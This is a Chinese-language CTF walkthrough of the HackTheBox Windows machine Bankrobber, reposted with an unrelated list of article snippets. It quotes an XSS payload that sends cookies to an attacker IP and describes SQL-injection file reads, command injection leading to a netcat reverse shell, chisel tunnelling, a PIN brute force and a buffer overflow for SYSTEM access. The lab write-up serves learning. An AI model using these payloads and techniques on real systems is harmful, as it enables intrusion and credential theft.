No.87-HackTheBox-windows-Bankrobber-Walkthrough渗透学习

2023-11-09

**

HackTheBox-windows-Bankrobber-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/209
靶机难度:初级(3.2/10)
靶机发布日期:2020年2月19日
靶机描述:
Bankrobber is an Insane difficulty Windows machine featuring a web server that is vulnerable to
XSS. This is exploited to steal the administrator’s cookies, which are used to gain access to the
admin panel. The panel is found to contain additional functionality, which can be exploited to
read files as well as execute code and gain foothold. An unknown service running on the box is
found to be vulnerable to a buffer overflow, which can be exploited to execute arbitrary
commands as SYSTEM.

作者:大余
时间:2020-04-27
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集收集

可以看到靶机的IP是10.10.10.154…
在这里插入图片描述
Nmap可以发现运行着SMB,HTTP和HTTPS,以及mysql…

在这里插入图片描述
访问http,这是一个货币加密的网页…
在这里插入图片描述
注册表格用于创建新帐户,然后登录…
在这里插入图片描述
登录后定向到了这个页面…
在这里插入图片描述
随意输入会弹出提示框:说管理员可能会在批准交易之前对其进行审查…
在这里插入图片描述
利用burp suite分析后,看到用户名和密码的cookie是base64编码的…
在这里插入图片描述
对comment值进行注入测试,发现存在XSS攻击
在这里插入图片描述
命令:<img src=x onerror=this.src='http://10.10.14.51/?cookies='+btoa(document.cookie) />
注入后可发现cookie得哈希值…==这是base64,转码…
在这里插入图片描述
命令:echo -n ... | base64 -d
通过XSS获得了用户名和密码…登陆即可…
在这里插入图片描述
登陆后,可以看到只可以使用dir命令,是防止黑客的攻击限制了…
在这里插入图片描述
可以进行sql注入…
在这里插入图片描述
通过了sqlmap进行挖掘,和参考mysql对sql注入的链接,利用MySQL LOAD_FILE()函数用于读取服务器上的文件…
可以看到成功获得了user信息…
这里需要获得反弹shell外壳…否则无法继续下一步root信息获取…
在这里插入图片描述
在admin目录下发现了backdoorchecker.php文件,可以看到$bad = array('$(','&'); $(并将&列入黑名单,并且$_SERVER['REMOTE_ADDR'] == "::1"仅允许来自其的请求…所以可以利用XSS来创建一个CSRF,开始测试下…
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到针对backdoorchecker文件的利用,测试了ping传输,可以返回数据…
这里就很多方法可以反弹shell了…
在这里插入图片描述
利用powershell上传nc,然后nc执行获得了反弹shell…
在这里插入图片描述
命令:netstat -ano | findstr LISTENING
在这里插入图片描述
命令:tasklist
当开始搜集信息时,在初目录就发现了bankv2.exe程序…可以看到TCP910端口运行着bankv2.exe程序…同ID
在这里插入图片描述
使用nc与该端口进行通讯时,进行链接了,但是当我按下Enter键随意输入四个字符后…被拒绝了…
而且该文件无法copy…本来想smbserver到本地进行分析…
这里将使用隧道技术进行渗透…
利用chisel工具搭建隧道!!
参考这篇文章,介绍了chisel技术的使用!!
在这里插入图片描述
在这里插入图片描述
命令:./chisel_linux_amd64 server --port 6000 --reverse
下载好后解压,然后开启本地的隧道…
在这里插入图片描述
命令:chisel.exe client 10.10.14.51:6000 R:910:127.0.0.1:910
隧道成功建立…
通过本地创建的隧道,链接了靶机910端口…这里需要进行暴力破解四位数PIN码…
在这里插入图片描述
可以看到…通过简单的python编写0~9999进行爆破,0021是PIN码…
在这里插入图片描述
0021是正确的…但是继续输入任何字符,返回结果都是一样…
这里应该存在缓冲区溢出…测试看看
在这里插入图片描述
通过AAAA测试…42A和32A之间,42A输入后,存在缓冲区溢出值…
在这里插入图片描述
命令:

/usr/bin/msf-pattern_create -l 100
/usr/bin/msf-pattern_offset -q 0Ab1

这里利用kali自带的msf-pattern_create来输出随机生成的100值…然后利用msf-pattern_offset将程序输出的值进行解析…
获得偏移量32…只要利用32的偏移量进行注入shell即可获得外壳…
在这里插入图片描述
通过前面提权上传的nc64.exe,利用python简单把命令压缩到32偏量,然后输入…
成功获得了system权限的反向外壳…
成功获得了root信息…

这台靶机学习了sql注入,XXE和XSRF外壳,python爆破,隧道技术,缓冲区溢出等等…

由于我们已经成功得到root权限查看user.txt和root.txt,因此完成这台简单的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

No.87-HackTheBox-windows-Bankrobber-Walkthrough渗透学习 的相关文章

随机推荐

  • 【动手学习pytorch笔记】33.Attention实现

    Attention实现 import math import torch from torch import nn from d2l import torch as d2l 带掩码的softmax 有些query是不应该看到后面的key的
  • glslViewer 介绍 (001)

    GitHub patriciogonzalezvivo glslViewer Console based GLSL Sandbox for 2D 3D shaders 起个头先 把官网的windows安装过程 step by step 化
  • unity实现mmd功能(跳舞)

    将pmx模型转化为fbx模型 将fbx模型导入 在对应的Inspector面板上的四个勾选打勾并Apply应用一下 在接下来弹出的界面中将vmd动画拖入到对应的Object栏中并点击生成相应动画的模型 vmd动画的制作 新建一个动画状态机控
  • 1.Windows环境配置

    1 做逆向Linux系统比Windows系统问题少的原因 Windows版本种类过多 Windows使用的编码不一样 2 电脑系统版本 原版Windows10即可 运行winver可查看系统版本 推荐版本 Windows10 专业版 20H
  • Hibernate-validator数据验证

    前言 数据效验工作在开发工作中 是非常重要的 保证数据的正确性 可靠性 安全性 不仅在前端进行效验 还要在后台继续进行效验 前端做验证只是为了用户体验 比如控制按钮的显示隐藏 单页应用的路由跳转等等 后端才是最终的保障 总之 一切用户的输入
  • opencv4.6 报错 error: ‘cv::xfeatures2d::SIFT’ has not been declared

    opencv4 6报错error cv xfeatures2d SIFT has not been declared SIFT 已经由 xfeatures2d 移至 主仓库 cv xfeatures2d SIFT create 改为 cv
  • 如何用一行 Python 代码实现并行

    前言 Python 在程序并行化方面多少有些声名狼藉 撇开技术上的问题 例如线程的实现和 GIL 我觉得错误的教学指导才是主要问 题 常见的经典 Python 多线程 多进程教程多显得偏 重 而且往往隔靴搔痒 没有深入探讨日常工作中最有用的
  • widows家庭版没有Hyper-v的解决方式

    首先这个是我在安装docker的时候遇到的问题 下面记录一下 复制下面代码到一个文本文件中去 然后修改后缀名为cmd然后运行即可 pushd dp0 dir b SystemRoot servicing Packages Hyper V m
  • jQuery.extend 函数详解

    转载自 http www cnblogs com RascallySnake archive 2010 05 07 1729563 html jQuery extend 函数详解 jQuery 的 extend 扩展方法 jQuery 的扩
  • 【构建ML驱动的应用程序】第 1 章 :从产品目标到 ML 框架

    大家好 我是Sonhhxg 柒 希望你看完之后 能对你有所帮助 不足请指正 共同学习交流 个人主页 Sonhhxg 柒的博客 CSDN博客 欢迎各位 点赞 收藏 留言 系列专栏 机器学习 ML 自然语言处理 NLP 深度学习 DL fore
  • 光耦电路

    光电耦合器 opticalcoupler 英文缩写为OC 亦称光电隔离器或光耦合器 简称光耦 它是以光为媒介来传输电信号的器件 通常把发光器 红外线发光二极管LED 与受光器 光敏半导体管 封装在同一管壳内 当输入端加电信号时发光二极管发出
  • python 实现 soap 请求

    1 什么是soap SOAP Simple Object Access Protocol 是一种基于XML的通信协议 用于在网络上交换结构化的和可扩展的信息 它被广泛用于分布式系统中的应用程序之间的通信 SOAP通过HTTP 或其他传输协议
  • AI绘画爆火背后:扩散模型(Diffusion Model)原理综述

    来源 知乎 大仲马 地址 https zhuanlan zhihu com p 562389931 本综述 Diffusion Models A Comprehensive Survey of Methods and Application
  • Linux下TCP通信时如果一方拔掉网线会怎么样?

    本文95 参考下面的链接 拔掉网线后 原本的 TCP 连接还存在吗 TCP协议 长连接和短连接 如果没有数据传输 不能被TCP感知到 TCP连接状态依旧保持 如果有数据传输 重传次数超过一定值 Linux下默认15 或超过一定的 超时时间则
  • 笔试

    文章目录 前言 1 什么叫FPGA 2 什么叫数字IC 3 FPGA设计流程 3 1系统规划 3 2RTL输入 3 3行为仿真 功能仿真 3 4逻辑综合 3 5综合后仿真 可选 3 6综合后设计分析 时序及资源 3 7设计实现 包括布局布线
  • 1024 祝我们快乐

    1024 祝我们快乐 前言 最近好久都很忙 所以没有在发过文章啦 但是今天这么激动的日子 还是忍不住想要祝你们快乐哈 感谢很多人的默默陪伴 比如平台 展现量直接上万 比如 你们 超级感谢 很感激你们的支持 虽说我不是最优秀的那一个 但是你们
  • spring 容器(控制反转及依赖注入)

    spring 是一个容器 项目开始就一直在运行 spring 加载进内存里面 容器中有监听器 引入容器 而struts注重运行时 核心类中监听器 监听启动后可以从context 上下文即spring所有的配置 中获取内容 将核心配置文件 a
  • 将本地的txt文件上传到mysql数据库中

    我的数据 1 将windows中的txt文件传入到Linux中 2 在mysql中将表创建好 例如 create table users userid int time date id int sex varchar 10 birthday
  • .NET 各种框架

    基于 NET平台常用的框架整理 分布式缓存框架 Microsoft Velocity 微软自家分布式缓存服务框架 Memcahed 一套分布式的高速缓存系统 目前被许多网站使用以提升网站的访问速度 Redis 是一个高性能的KV数据库 它的
  • No.87-HackTheBox-windows-Bankrobber-Walkthrough渗透学习

    HackTheBox windows Bankrobber Walkthrough 靶机地址 https www hackthebox eu home machines profile 209 靶机难度 初级 3 2 10 靶机发布日期 2